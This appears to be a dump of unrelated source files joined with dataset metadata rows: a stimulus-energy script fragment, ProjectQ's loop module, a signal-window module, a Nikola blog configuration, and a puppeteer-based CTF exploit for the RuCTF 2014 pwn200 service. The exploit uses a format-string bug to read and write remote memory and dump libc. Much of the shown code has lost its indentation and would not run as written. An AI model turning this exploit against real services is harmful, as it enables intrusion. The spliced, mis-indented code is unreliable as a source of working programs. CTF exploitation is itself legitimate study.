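    energy, filters = calc_energy_and_filters(stim, stim_df, n_orientations=6)
    # max_ht = floor(log2(32)) - 2 = 3 scales
    assert energy.shape == (2, 3, 6) + img_size
    assert filters.shape == (3, 6) + img_size
    return energy, filters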
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=("Calculate and save the energy for each stimulus class, as well as the Fourier"
" transform of the filters of the steerable pyramid we use to get this. For "
"use with image-computable version of this model"),
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("stimuli",
help=("Path to the stimulus .npy file."))
parser.add_argument("stimuli_description_df",
help=("Path to the stimulus description dataframe .csv file."))
parser.add_argument("save_path_template",
help=("Path template (with .npy extension) where we'll save the results. "
"Should contain one %s."))
parser.add_argument('--n_orientations', '-n', default=6, type=int,
help=("The number of orientations in the steerable pyramid used here."))
args = vars(parser.parse_args())
stim = np.load(args.pop('stimuli'))
stim_df = pd.read_csv(args.pop('stimuli_description_df'))
calc_energy_and_filters(stim, stim_df, **args)
| mit | 7,969,133,745,800,178,000 | 51.423077 | 128 | 0.634776 | false |
ProjectQ-Framework/ProjectQ | projectq/meta/_loop.py | 1 | 9774 | # -*- coding: utf-8 -*-
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tools to implement loops.
Example:
.. code-block:: python
with Loop(eng, 4):
H | qb
Rz(M_PI/3.) | qb
"""
from copy import deepcopy
from projectq.cengines import BasicEngine
from projectq.ops import Allocate, Deallocate
from ._util import insert_engine, drop_engine_after
class QubitManagementError(Exception):
"""Exception raised when the lifetime of a qubit is problematic within a loop"""
class LoopTag:
"""
Loop meta tag
"""
def __init__(self, num):
self.num = num
self.id = LoopTag.loop_tag_id
LoopTag.loop_tag_id += 1
def __eq__(self, other):
return isinstance(other, LoopTag) and self.id == other.id and self.num == other.num
def __ne__(self, other):
return not self.__eq__(other)
loop_tag_id = 0
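# Illustrative sketch (assumption: engine and gate names follow the public
# ProjectQ API; this helper is not part of the original module). It shows the
# intended use of the Loop context manager defined in this module: the loop body
# is either tagged with a LoopTag or unrolled by LoopEngine, depending on
# whether a later engine supports the tag.
def _loop_usage_sketch():
    # imports are local to avoid a circular import when this module is loaded
    from projectq import MainEngine
    from projectq.meta import Loop
    from projectq.ops import H, Measure
    eng = MainEngine()
    qubit = eng.allocate_qubit()
    with Loop(eng, 3):
        H | qubit
    Measure | qubit
    eng.flush()
    return int(qubit)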
class LoopEngine(BasicEngine):
"""
Stores all commands and, when done, executes them num times if no loop tag
handler engine is available.
If there is one, it adds a loop_tag to the commands and sends them on.
"""
def __init__(self, num):
"""
Initialize a LoopEngine.
Args:
num (int): Number of loop iterations.
"""
BasicEngine.__init__(self)
self._tag = LoopTag(num)
self._cmd_list = []
self._allocated_qubit_ids = set()
self._deallocated_qubit_ids = set()
# key: qubit id of a local qubit, i.e. a qubit which has been allocated
# and deallocated within the loop body.
# value: list contain reference to each weakref qubit with this qubit
# id either within control_qubits or qubits.
self._refs_to_local_qb = dict()
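        # Set to True once we learn that a later engine handles LoopTag (checked lazily in receive()).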
self._next_engines_support_loop_tag = False
def run(self):
"""
Apply the loop statements to all stored commands.
Unrolls the loop if LoopTag is not supported by any of the following
engines, i.e., if
.. code-block:: python
is_meta_tag_supported(next_engine, LoopTag) == False
"""
error_message = (
"\n Error. Qubits have been allocated in with "
"Loop(eng, num) context,\n which have not "
"explicitely been deallocated in the Loop context.\n"
"Correct usage:\nwith Loop(eng, 5):\n"
" qubit = eng.allocate_qubit()\n"
" ...\n"
" del qubit[0]\n"
)
if not self._next_engines_support_loop_tag: # pylint: disable=too-many-nested-blocks
# Unroll the loop
# Check that local qubits have been deallocated:
if self._deallocated_qubit_ids != self._allocated_qubit_ids:
raise QubitManagementError(error_message)
if len(self._allocated_qubit_ids) == 0:
# No local qubits, just send the circuit num times
for i in range(self._tag.num):
self.send(deepcopy(self._cmd_list))
else:
# Ancilla qubits have been allocated in loop body
# For each iteration, allocate and deallocate a new qubit and
# replace the qubit id in all commands using it.
for i in range(self._tag.num):
if i == 0: # Don't change local qubit ids
self.send(deepcopy(self._cmd_list))
else:
# Change local qubit ids before sending them
for refs_loc_qubit in self._refs_to_local_qb.values():
new_qb_id = self.main_engine.get_new_qubit_id()
for qubit_ref in refs_loc_qubit:
qubit_ref.id = new_qb_id
self.send(deepcopy(self._cmd_list))
else:
# Next engines support loop tag so no unrolling needed only
# check that all qubits have been deallocated which have been
# allocated in the loop body
if self._deallocated_qubit_ids != self._allocated_qubit_ids:
raise QubitManagementError(error_message)
def receive(self, command_list): # pylint: disable=too-many-branches
"""
Receive (and potentially temporarily store) all commands.
Add LoopTag to all receiving commands and send to the next engine if
a further engine is a LoopTag-handling engine. Otherwise store all
commands (to later unroll them). Check that within the loop body,
all allocated qubits have also been deallocated. If loop needs to be
unrolled and ancilla qubits have been allocated within the loop body,
        then store a reference to all these qubit ids (to change them when
unrolling the loop)
Args:
command_list (list<Command>): List of commands to store and later
unroll or, if there is a LoopTag-handling engine, add the
LoopTag.
"""
# pylint: disable=too-many-nested-blocks
if self._next_engines_support_loop_tag or self.next_engine.is_meta_tag_supported(LoopTag):
# Loop tag is supported, send everything with a LoopTag
# Don't check is_meta_tag_supported anymore
self._next_engines_support_loop_tag = True
if self._tag.num == 0:
return
for cmd in command_list:
if cmd.gate == Allocate:
self._allocated_qubit_ids.add(cmd.qubits[0][0].id)
elif cmd.gate == Deallocate:
self._deallocated_qubit_ids.add(cmd.qubits[0][0].id)
cmd.tags.append(self._tag)
self.send([cmd])
else:
# LoopTag is not supported, save the full loop body
self._cmd_list += command_list
# Check for all local qubits allocated and deallocated in loop body
for cmd in command_list:
if cmd.gate == Allocate:
self._allocated_qubit_ids.add(cmd.qubits[0][0].id)
# Save reference to this local qubit
self._refs_to_local_qb[cmd.qubits[0][0].id] = [cmd.qubits[0][0]]
elif cmd.gate == Deallocate:
self._deallocated_qubit_ids.add(cmd.qubits[0][0].id)
# Save reference to this local qubit
self._refs_to_local_qb[cmd.qubits[0][0].id].append(cmd.qubits[0][0])
else:
# Add a reference to each place a local qubit id is
# used as within either control_qubit or qubits
for control_qubit in cmd.control_qubits:
if control_qubit.id in self._allocated_qubit_ids:
self._refs_to_local_qb[control_qubit.id].append(control_qubit)
for qureg in cmd.qubits:
for qubit in qureg:
if qubit.id in self._allocated_qubit_ids:
self._refs_to_local_qb[qubit.id].append(qubit)
class Loop:
"""
Loop n times over an entire code block.
Example:
.. code-block:: python
with Loop(eng, 4):
# [quantum gates to be executed 4 times]
Warning:
If the code in the loop contains allocation of qubits, those qubits have to be deleted prior to exiting the
'with Loop()' context.
This code is **NOT VALID**:
.. code-block:: python
with Loop(eng, 4):
qb = eng.allocate_qubit()
H | qb # qb is still available!!!
The **correct way** of handling qubit (de-)allocation is as follows:
.. code-block:: python
with Loop(eng, 4):
qb = eng.allocate_qubit()
...
del qb # sends deallocate gate
"""
def __init__(self, engine, num):
"""
Enter a looped section.
Args:
engine: Engine handling the commands (usually MainEngine)
num (int): Number of loop iterations
Example:
.. code-block:: python
with Loop(eng, 4):
H | qb
Rz(M_PI/3.) | qb
Raises:
TypeError: If number of iterations (num) is not an integer
ValueError: If number of iterations (num) is not >= 0
"""
self.engine = engine
if not isinstance(num, int):
raise TypeError("Number of loop iterations must be an int.")
if num < 0:
raise ValueError("Number of loop iterations must be >=0.")
self.num = num
self._loop_eng = None
def __enter__(self):
if self.num != 1:
self._loop_eng = LoopEngine(self.num)
insert_engine(self.engine, self._loop_eng)
def __exit__(self, exc_type, exc_value, exc_traceback):
if self.num != 1:
# remove loop handler from engine list (i.e. skip it)
self._loop_eng.run()
self._loop_eng = None
drop_engine_after(self.engine)
| apache-2.0 | -7,039,027,857,358,893,000 | 37.031128 | 115 | 0.562717 | false |
shellphish/puppeteer | examples/ructf_2014_pwn200/doit.py | 1 | 2635 | import puppeteer as p
import logging
try:
import standard_logging # pylint: disable=W0611
except ImportError:
pass
#logging.getLogger("puppeteer.connection").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.manipulator").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.vuln_decorators").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.formatter").setLevel(logging.DEBUG)
class Aggravator(p.Manipulator):
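  # Manipulator for the RuCTF 2014 pwn200 service: the "stats" command exposes a format-string primitive (see stats_printf below).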
def __init__(self, host, port):
p.Manipulator.__init__(self, p.x86)
# some initial info from IDA
# TODO: maybe use IDALink to get this automatically?
self.permanent_info['main_start'] = 0x0804A9B3
self.permanent_info['main_end'] = 0x0804A9D1
self.permanent_info['main_stackframe_size'] = 0x24
self.c = self.set_connection(p.Connection(host=host, port=port).connect())
self.c.read_until("> ")
@p.printf(byte_offset=244, max_length=31, forbidden={'\x00', '\x0a'})
def stats_printf(self, fmt):
self.c.send("stats " + fmt + "\n")
self.c.read_until("kill top:\n")
try:
result = self.c.read_until("\n"*5, timeout=3)[:-5]
self.c.read_until("> ", timeout=3)
except EOFError:
print "Program didn't finish the print"
return ""
#print "GOT:",repr(result)
return result
def main():
# Create the Aggravator!
a = Aggravator(sys.argv[1], int(sys.argv[2]))
  # And now, we can do stuff!
# We can read the stack!
#print "STACKZ",a.dump_stack(1000).encode('hex')
print "Testing memory read."
assert a.do_memory_read(0x0804A9C3, 16) == '\x00\x8B\x44\x24\x1C\x89\x04\x24\xE8\x20\xFE\xFF\xFF\xC9\xC3\x66'
## We can figure out where __libc_start_main is!
lcsm = a.main_return_address(start_offset=390)
print "main() will return to (presumably, this is in libc):",hex(lcsm)
# interactive memory explorer!
a.memory_explorer(lcsm)
# now dump it!
libc = a.dump_elf(lcsm) #- 0x1000 # the minus is because on my test machine, the address has a \x00 in it
print "dumped %d pages from libc" % len(libc)
#a.dump_libc("aggregator_libc", start_offset=390)
# We can overwrite memory with ease!
a.do_memory_write(0x0804C344, "OK")
assert a.do_memory_read(0x0804C344, 2) == "OK"
a.c.send("quit\n")
#libc_page_start = lcsm & 0xfffff000
#libc_page_content = a.do_memory_read(libc_page_start, 0x1000)
#open("dumped", "w").write(libc_page_content)
#print "read out %d bytes from libc!" % len(libc_page_content)
if __name__ == '__main__':
import sys
main()
| gpl-3.0 | -910,140,454,615,389,800 | 33.671053 | 113 | 0.639848 | false |
jpaasen/cos | framework/Window.py | 1 | 5925 | #from TypeExtensions import Ndarray
from gfuncs import processArgs
from mynumpy import pi, dot, cos, sin, exp #ones, complex, sin, linspace, exp, pi, dot, angle
import mynumpy as np
#from pylab import plot, subplot, xlabel, ylabel, grid, show, figure, ion, ioff
class Window(np.Ndarray):
def __new__(self, type='rect', **kwargs):
from gfuncs import error
if type == 'rect':
         return Rect(**kwargs)
elif type == 'kaiser':
         return Kaiser(**kwargs)
else:
error(self, 'The window type %s is not recognised'%type)
#
# Configurable.__init__(self)
# Operable.__init__(self)
class Rect(np.Ndarray):
def __new__(self, M=10, phi=0, normalised=True):
# Create the window
if phi == 0:
win = np.ones( (M,), dtype=None ) / M
else:
wc = np.ones( M, dtype=complex ) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Rectangular (phi=%d)'%phi)
# desc='Rectangular (phi=%d)'%phi,
# shape_desc=('M','1'))
return w
class Trig(np.Ndarray):
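   # Generalised cosine taper a + (1-a)*cos(2*pi*n): a=0.54 gives a Hamming-style window, a=0.5 a Hann window.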
def __new__(self, M=10, a=0.54, phi=0, normalised=True):
# Create the window
if phi == 0:
wc = a + (1-a)*np.cos(2*pi*np.linspace(-0.5,0.5,M))
win = wc / sum(wc) # Normalised window
else:
n = np.linspace(-0.5,0.5,M)
wc = a + (1-a)*np.cos(2*pi*n) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
aa = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, aa) # Normalisation factor
win = aa * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Rectangular (phi=%d)'%phi)
# desc='Rectangular (phi=%d)'%phi,
# shape_desc=('M','1'))
return w
class Kaiser(np.Ndarray):
'''kaiser( M=10, beta=1, phi=0, normalised=True )
The Kaiser window is a taper formed by using a Bessel function.
Parameters
----------
M (int) : Number of points in the output window.
beta (float) : Shape parameter for window.
phi (float) : Steering angle.
normalised (boolean) : Use normalised window coefficients?
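
    Example (illustrative)::

        w = Kaiser(M=16, beta=3, phi=0.05)   # steered, normalised 16-tap window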
'''
def __new__(self, M=10, beta=1, phi=0, normalised=True, inverted=False):
if not inverted:
if phi == 0:
wc = np.kaiser(M, beta) # Window coefficients
win = wc / sum(wc) # Normalised window
else:
wc = np.kaiser(M, beta) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
else:
if phi == 0:
wc = 1 / np.kaiser(M, beta) # Window coefficients
win = wc / sum(wc) # Normalised window
else:
wc = 1 / np.kaiser(M, beta) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc,a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Kaiser (beta=%d, phi=%d)'%(beta,phi))
# shape_desc=('M','1'))
return w
# def plot(self, **kwargs):
#
# # Set some default options
# opts = {'magnitude':True, 'angle':False, 'grid':True, 'degrees':True}
#
# # Add the user-specified options
# for key,val in kwargs.iteritems():
# if opts.has_key(key):
# opts[key] = val
# else:
# opts[key] = val
# print 'WW: Window.plot() - Supplied parameter '+key+' is unknown.'
#
# ion()
# if opts['magnitude'] and opts['angle']:
# figure()
# subplot(2,1,1)
# plot( abs(self.w) )
# xlabel( 'Channel #' )
# ylabel( 'Magnitude' )
# grid( opts['grid'] )
#
# subplot(2,1,2)
# plot( angle(self.w, deg=opts['degrees']) )
# xlabel( 'Channel #' )
# if opts['degrees']:
# ylabel( 'Angle [degrees]' )
# else:
# ylabel( 'Angle [radians]' )
# grid( opts['grid'] )
## show()
#
# elif opts['magnitude']:
# figure()
# plot( abs(self.w) )
# xlabel( 'Channel #' )
# ylabel( 'Magnitude' )
# grid( opts['grid'] )
## show()
#
# else:
# figure()
# plot( angle(self.w, deg=opts['degrees']) )
# xlabel( 'Channel #' )
# if opts['degrees']:
# ylabel( 'Angle [degrees]' )
# else:
# ylabel( 'Angle [radians]' )
# grid( opts['grid'] )
## show()
# ioff()
| mit | 5,193,458,981,794,878,000 | 36.5 | 93 | 0.4427 | false |
masterdje/wibfi | conf.py | 1 | 22684 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
# Configuration, please edit
# Data about this site
BLOG_AUTHOR = "Dje"
BLOG_TITLE = "Write it before forget it!"
# This is the main URL for your site. It will be used
# in a prominent link
SITE_URL = "http://wibfi.virtua-peanuts.net/"
# This is the URL where nikola's output will be deployed.
# If not set, defaults to SITE_URL
# BASE_URL = "http://getnikola.com/"
BLOG_EMAIL = "[email protected]"
BLOG_DESCRIPTION = "Write it before forget it !"
# Nikola is multilingual!
#
# Currently supported languages are:
# en English
# bg Bulgarian
# ca Catalan
# zh_cn Chinese (Simplified)
# hr Croatian
# nl Dutch
# fr French
# el Greek [NOT gr!]
# de German
# it Italian
# jp Japanese
# fa Persian
# pl Polish
# pt_br Portuguese (Brasil)
# ru Russian
# es Spanish
# tr_tr Turkish (Turkey)
#
# If you want to use Nikola with a non-supported language you have to provide
# a module containing the necessary translations
# (e.g. look at the modules at: ./nikola/data/themes/default/messages/fr.py).
# If a specific post is not translated to a language, then the version
# in the default language will be shown instead.
#from nikola import filters
#FILTERS = {
# ".css": [filters.yui_compressor],
#".js": [filters.yui_compressor],
#}
# What is the default language?
DEFAULT_LANG = "fr"
LOCALES = {'fr': 'fr_FR.utf8', 'en': 'en_US.utf8'}
# What other languages do you have?
# The format is {"translationcode" : "path/to/translation" }
# the path will be used as a prefix for the generated pages location
TRANSLATIONS = {
DEFAULT_LANG: "",
# Example for another language:
"en": "./en",
}
TRANSLATIONS_PATTERN = "{path}.{ext}.{lang}"
# Links for the sidebar / navigation bar.
# You should provide a key-value pair for each used language.
NAVIGATION_LINKS = {
DEFAULT_LANG: (
('/stories/cheatsheets.html', "Cheat-Sheets"),
('/stories/what-s-next.html', "What's next"),
('/archive.html', 'Archives'),
('/categories/index.html', 'Tags'),
('/rss.xml', 'RSS'),
),
"en": (
('/en/stories/cheatsheets.html', "Cheat-Sheets"),
('/en/stories/what-s-next.html', "What's next"),
('/en/archive.html', 'Archives'),
('/en/categories/index.html', 'Tags'),
('/en/rss.xml', 'RSS'),
),
}
# Below this point, everything is optional
# POSTS and PAGES contains (wildcard, destination, template) tuples.
#
# The wildcard is used to generate a list of reSt source files
# (whatever/thing.txt).
#
# That fragment could have an associated metadata file (whatever/thing.meta),
# and optionally translated files (example for Spanish, with code "es"):
# whatever/thing.txt.es and whatever/thing.meta.es
#
# From those files, a set of HTML fragment files will be generated:
# cache/whatever/thing.html (and maybe cache/whatever/thing.html.es)
#
# These files are combined with the template to produce rendered
# pages, which will be placed at
# output / TRANSLATIONS[lang] / destination / pagename.html
#
# where "pagename" is the "slug" specified in the metadata file.
#
# The difference between POSTS and PAGES is that POSTS are added
# to feeds and are considered part of a blog, while PAGES are
# just independent HTML pages.
#
POSTS = (
("posts/*.txt", "posts", "post.tmpl"),
("posts/*.rst", "posts", "post.tmpl"),
)
PAGES = (
("stories/*.txt", "stories", "story.tmpl"),
("stories/*.rst", "stories", "story.tmpl"),
)
# One or more folders containing files to be copied as-is into the output.
# The format is a dictionary of "source" "relative destination".
# Default is:
FILES_FOLDERS = { 'test': '', 'test': 'posts/','test': 'stories/'}
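# Note: duplicate dict keys collapse in Python, so only the last 'test' mapping above takes effect.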
# Which means copy 'files' into 'output'
# A mapping of languages to file-extensions that represent that language.
# Feel free to add or delete extensions to any list, but don't add any new
# compilers unless you write the interface for it yourself.
#
# 'rest' is reStructuredText
# 'markdown' is MarkDown
# 'html' assumes the file is html and just copies it
COMPILERS = {
"rest": ('.rst', '.txt'),
"markdown": ('.md', '.mdown', '.markdown'),
"textile": ('.textile',),
"txt2tags": ('.t2t',),
"bbcode": ('.bb',),
"wiki": ('.wiki',),
"ipynb": ('.ipynb',),
"html": ('.html', '.htm'),
}
# Create by default posts in one file format?
# Set to False for two-file posts, with separate metadata.
ONE_FILE_POSTS = True
# If this is set to True, then posts that are not translated to a language
# LANG will not be visible at all in the pages in that language.
# If set to False, the DEFAULT_LANG version will be displayed for
# untranslated posts.
# HIDE_UNTRANSLATED_POSTS = False
# Paths for different autogenerated bits. These are combined with the
# translation paths.
# Final locations are:
# output / TRANSLATION[lang] / TAG_PATH / index.html (list of tags)
# output / TRANSLATION[lang] / TAG_PATH / tag.html (list of posts for a tag)
# output / TRANSLATION[lang] / TAG_PATH / tag.xml (RSS feed for a tag)
TAG_PATH = "categories"
# If TAG_PAGES_ARE_INDEXES is set to True, each tag's page will contain
# the posts themselves. If set to False, it will be just a list of links.
# TAG_PAGES_ARE_INDEXES = True
# Final location is output / TRANSLATION[lang] / INDEX_PATH / index-*.html
# INDEX_PATH = ""
# Create per-month archives instead of per-year
CREATE_MONTHLY_ARCHIVE = True
# Final locations for the archives are:
# output / TRANSLATION[lang] / ARCHIVE_PATH / ARCHIVE_FILENAME
# output / TRANSLATION[lang] / ARCHIVE_PATH / YEAR / index.html
# output / TRANSLATION[lang] / ARCHIVE_PATH / YEAR / MONTH / index.html
# ARCHIVE_PATH = ""
# ARCHIVE_FILENAME = "archive.html"
# Final locations are:
# output / TRANSLATION[lang] / RSS_PATH / rss.xml
# RSS_PATH = ""
# Number of posts in RSS feeds
FEED_LENGTH = 10
# Slug the Tag URL to make it easier for users to type; special characters are
# often removed or replaced as well.
# SLUG_TAG_PATH = True
# A list of redirection tuples, [("foo/from.html", "/bar/to.html")].
#
# A HTML file will be created in output/foo/from.html that redirects
# to the "/bar/to.html" URL. notice that the "from" side MUST be a
# relative URL.
#
# If you don't need any of these, just set to []
# REDIRECTIONS = []
# Commands to execute to deploy. Can be anything, for example,
# you may use rsync:
# And then do a backup, or ping pingomatic.
# To do manual deployment, set it to []
DEPLOY_COMMANDS = ['lftp -e "mirror --delete-first -R output/ .;exit" [email protected]/wibfi',
'echo Save ...',
'cd .. ; tar cvjf _save-wibfi_.tgz wibfi/ ; lftp -e "put _save-wibfi_.tgz;exit" [email protected]/wibfi/backup; cd wibfi']
# Where the output site should be located
# If you don't use an absolute path, it will be considered as relative
# to the location of conf.py
# OUTPUT_FOLDER = 'output'
# where the "cache" of partial generated content should be located
# default: 'cache'
# CACHE_FOLDER = 'cache'
# Filters to apply to the output.
# A directory where the keys are either: a file extensions, or
# a tuple of file extensions.
#
# And the value is a list of commands to be applied in order.
#
# Each command must be either:
#
# A string containing a '%s' which will
# be replaced with a filename. The command *must* produce output
# in place.
#
# Or:
#
# A python callable, which will be called with the filename as
# argument.
#
# By default, there are no filters.
# FILTERS = {
# ".jpg": ["jpegoptim --strip-all -m75 -v %s"],
# }
# Create a gzipped copy of each generated file. Cheap server-side optimization.
GZIP_FILES = True
# File extensions that will be compressed
GZIP_EXTENSIONS = ('.txt','.rst', '.htm', '.html', '.css', '.js', '.json')
# #############################################################################
# Image Gallery Options
# #############################################################################
# Galleries are folders in galleries/
# Final location of galleries will be output / GALLERY_PATH / gallery_name
# GALLERY_PATH = "galleries"
# THUMBNAIL_SIZE = 180
# MAX_IMAGE_SIZE = 1280
# USE_FILENAME_AS_TITLE = True
# #############################################################################
# HTML fragments and diverse things that are used by the templates
# #############################################################################
# Data about post-per-page indexes
# INDEXES_TITLE = "" # If this is empty, the default is BLOG_TITLE
# INDEXES_PAGES = "" # If this is empty, the default is 'old posts page %d'
# translated
# Name of the theme to use.
THEME = "w2"
# Color scheme to be used for code blocks. If your theme provides
# "assets/css/code.css" this is ignored.
# Can be any of autumn borland bw colorful default emacs friendly fruity manni
# monokai murphy native pastie perldoc rrt tango trac vim vs
CODE_COLOR_SCHEME = 'borland'
# If you use 'site-reveal' theme you can select several subthemes
# THEME_REVEAL_CONFIG_SUBTHEME = 'sky'
# You can also use: beige/serif/simple/night/default
# Again, if you use 'site-reveal' theme you can select several transitions
# between the slides
# THEME_REVEAL_CONFIG_TRANSITION = 'cube'
# You can also use: page/concave/linear/none/default
# date format used to display post dates.
# (str used by datetime.datetime.strftime)
# DATE_FORMAT = '%Y-%m-%d %H:%M'
# FAVICONS contains (name, file, size) tuples.
# Used for create favicon link like this:
# <link rel="name" href="file" sizes="size"/>
# For creating favicons, take a look at:
# http://www.netmagazine.com/features/create-perfect-favicon
FAVICONS = {
("icon", "/favicon.ico", "16x16"),
("icon", "/favicon.png", "64x64"),
}
# Show only teasers in the index pages? Defaults to False.
INDEX_TEASERS = True
# A HTML fragment with the Read more... link.
# The following tags exist and are replaced for you:
# {link} A link to the full post page.
# {read_more} The string “Read more” in the current language.
# {{ A literal { (U+007B LEFT CURLY BRACKET)
# }} A literal } (U+007D RIGHT CURLY BRACKET)
READ_MORE_LINK = '<p class="more"><a href="{link}">{read_more}…</a></p>'
# A HTML fragment describing the license, for the sidebar.
LICENSE = '<a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/fr/"><img title="TL;DR" alt="Licence Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-sa/3.0/fr/88x31.png" /></a>'
# I recommend using the Creative Commons' wizard:
# http://creativecommons.org/choose/
# LICENSE = """
# <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/ar/">
# <img alt="Creative Commons License BY-NC-SA"
# style="border-width:0; margin-bottom:12px;"
# src="http://i.creativecommons.org/l/by-nc-sa/2.5/ar/88x31.png"></a>"""
# A small copyright notice for the page footer (in HTML).
# Default is ''
XITI = """<a href="http://www.xiti.com/xiti.asp?s=538203" title="WebAnalytics" target="_top">
<script type="text/javascript">
<!--
Xt_param = 's=538203&p=index';
try {Xt_r = top.document.referrer;}
catch(e) {Xt_r = document.referrer; }
Xt_h = new Date();
Xt_i = '<img width="80" height="15" border="0" alt="" ';
Xt_i += 'src="http://logv4.xiti.com/g.xiti?'+Xt_param;
Xt_i += '&hl='+Xt_h.getHours()+'x'+Xt_h.getMinutes()+'x'+Xt_h.getSeconds();
if(parseFloat(navigator.appVersion)>=4)
{Xt_s=screen;Xt_i+='&r='+Xt_s.width+'x'+Xt_s.height+'x'+Xt_s.pixelDepth+'x'+Xt_s.colorDepth;}
document.write(Xt_i+'&ref='+Xt_r.replace(/[<>"]/g, '').replace(/&/g, '$')+'" title="Internet Audience">');
//-->
</script>
<noscript>
<img width="80" height="15" src="http://logv4.xiti.com/g.xiti?s=538203&p=index" alt="WebAnalytics" />
</noscript></a>"""
CONTENT_FOOTER = '2013 - {date} <a href="mailto:{email}">{author}</a> mais c\'est <a href="http://getnikola.com">Nikola</a> qui propulse. {license} - {xiti}'
CONTENT_FOOTER = CONTENT_FOOTER.format(email=BLOG_EMAIL,
author=BLOG_AUTHOR,
date=time.gmtime().tm_year,
license=LICENSE, xiti=XITI)
# To use comments, you can choose between different third party comment
# systems, one of "disqus", "livefyre", "intensedebate", "moot",
# "googleplus" or "facebook"
COMMENT_SYSTEM = "disqus"
# And you also need to add your COMMENT_SYSTEM_ID which
# depends on what comment system you use. The default is
# "nikolademo" which is a test account for Disqus. More information
# is in the manual.
COMMENT_SYSTEM_ID = "wibfi"
# Create index.html for story folders?
# STORY_INDEX = False
# Enable comments on story pages?
# COMMENTS_IN_STORIES = False
# Enable comments on picture gallery pages?
# COMMENTS_IN_GALLERIES = False
# What file should be used for directory indexes?
# Defaults to index.html
# Common other alternatives: default.html for IIS, index.php
# INDEX_FILE = "index.html"
# If a link ends in /index.html, drop the index.html part.
# http://mysite/foo/bar/index.html => http://mysite/foo/bar/
# (Uses the INDEX_FILE setting, so if that is, say, default.html,
# it will instead /foo/default.html => /foo)
# (Note: This was briefly STRIP_INDEX_HTML in v 5.4.3 and 5.4.4)
# Default = False
# STRIP_INDEXES = False
# Should the sitemap list directories which only include other directories
# and no files.
# Default to True
# If this is False
# e.g. /2012 includes only /01, /02, /03, /04, ...: don't add it to the sitemap
# if /2012 includes any files (including index.html)... add it to the sitemap
# SITEMAP_INCLUDE_FILELESS_DIRS = True
# Instead of putting files in <slug>.html, put them in
# <slug>/index.html. Also enables STRIP_INDEXES
# This can be disabled on a per-page/post basis by adding
# .. pretty_url: False
# to the metadata
# PRETTY_URLS = False
# If True, publish future dated posts right away instead of scheduling them.
# Defaults to False.
# FUTURE_IS_NOW = False
# If True, future dated posts are allowed in deployed output
# Only the individual posts are published/deployed; not in indexes/sitemap
# Generally, you want FUTURE_IS_NOW and DEPLOY_FUTURE to be the same value.
# DEPLOY_FUTURE = False
# If False, draft posts will not be deployed
# DEPLOY_DRAFTS = True
# Allows scheduling of posts using the rule specified here (new_post -s)
# Specify an iCal Recurrence Rule: http://www.kanzaki.com/docs/ical/rrule.html
#SCHEDULE_RULE = 'RRULE:FREQ=DAILY;BYHOUR=12;BYMINUTE=0;BYSECOND=0'
# If True, use the scheduling rule to all posts by default
SCHEDULE_ALL = False
# If True, schedules post to today if possible, even if scheduled hour is over
# SCHEDULE_FORCE_TODAY = False
# Do you want a add a Mathjax config file?
# MATHJAX_CONFIG = ""
# If you are using the compile-ipynb plugin, just add this one:
#MATHJAX_CONFIG = """
#<script type="text/x-mathjax-config">
#MathJax.Hub.Config({
# tex2jax: {
# inlineMath: [ ['$','$'], ["\\\(","\\\)"] ],
# displayMath: [ ['$$','$$'], ["\\\[","\\\]"] ]
# },
# displayAlign: 'left', // Change this to 'center' to center equations.
# "HTML-CSS": {
# styles: {'.MathJax_Display': {"margin": 0}}
# }
#});
#</script>
#"""
# What MarkDown extensions to enable?
# You will also get gist, nikola and podcast because those are
# done in the code, hope you don't mind ;-)
# MARKDOWN_EXTENSIONS = ['fenced_code', 'codehilite']
# Social buttons. This is sample code for AddThis (which was the default for a
# long time). Insert anything you want here, or even make it empty.
SOCIAL_BUTTONS_CODE = ""
# <!-- Social buttons -->
# <div id="addthisbox" class="addthis_toolbox addthis_peekaboo_style addthis_default_style addthis_label_style addthis_32x32_style">
# <a class="addthis_button_more">Share</a>
# <ul><li><a class="addthis_button_facebook"></a>
# <li><a class="addthis_button_google_plusone_share"></a>
# <li><a class="addthis_button_linkedin"></a>
# <li><a class="addthis_button_twitter"></a>
# </ul>
# </div>
# <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4f7088a56bb93798"></script>
# <!-- End of social buttons -->
#"""
# Hide link to source for the posts?
HIDE_SOURCELINK = True
# Copy the source files for your pages?
# Setting it to False implies HIDE_SOURCELINK = True
COPY_SOURCES = False
# Modify the number of Post per Index Page
# Defaults to 10
INDEX_DISPLAY_POST_COUNT = 10
# RSS_LINK is a HTML fragment to link the RSS or Atom feeds. If set to None,
# the base.tmpl will use the feed Nikola generates. However, you may want to
# change it for a feedburner feed or something else.
# RSS_LINK = None
# Show only teasers in the RSS feed? Default to True
RSS_TEASERS = True
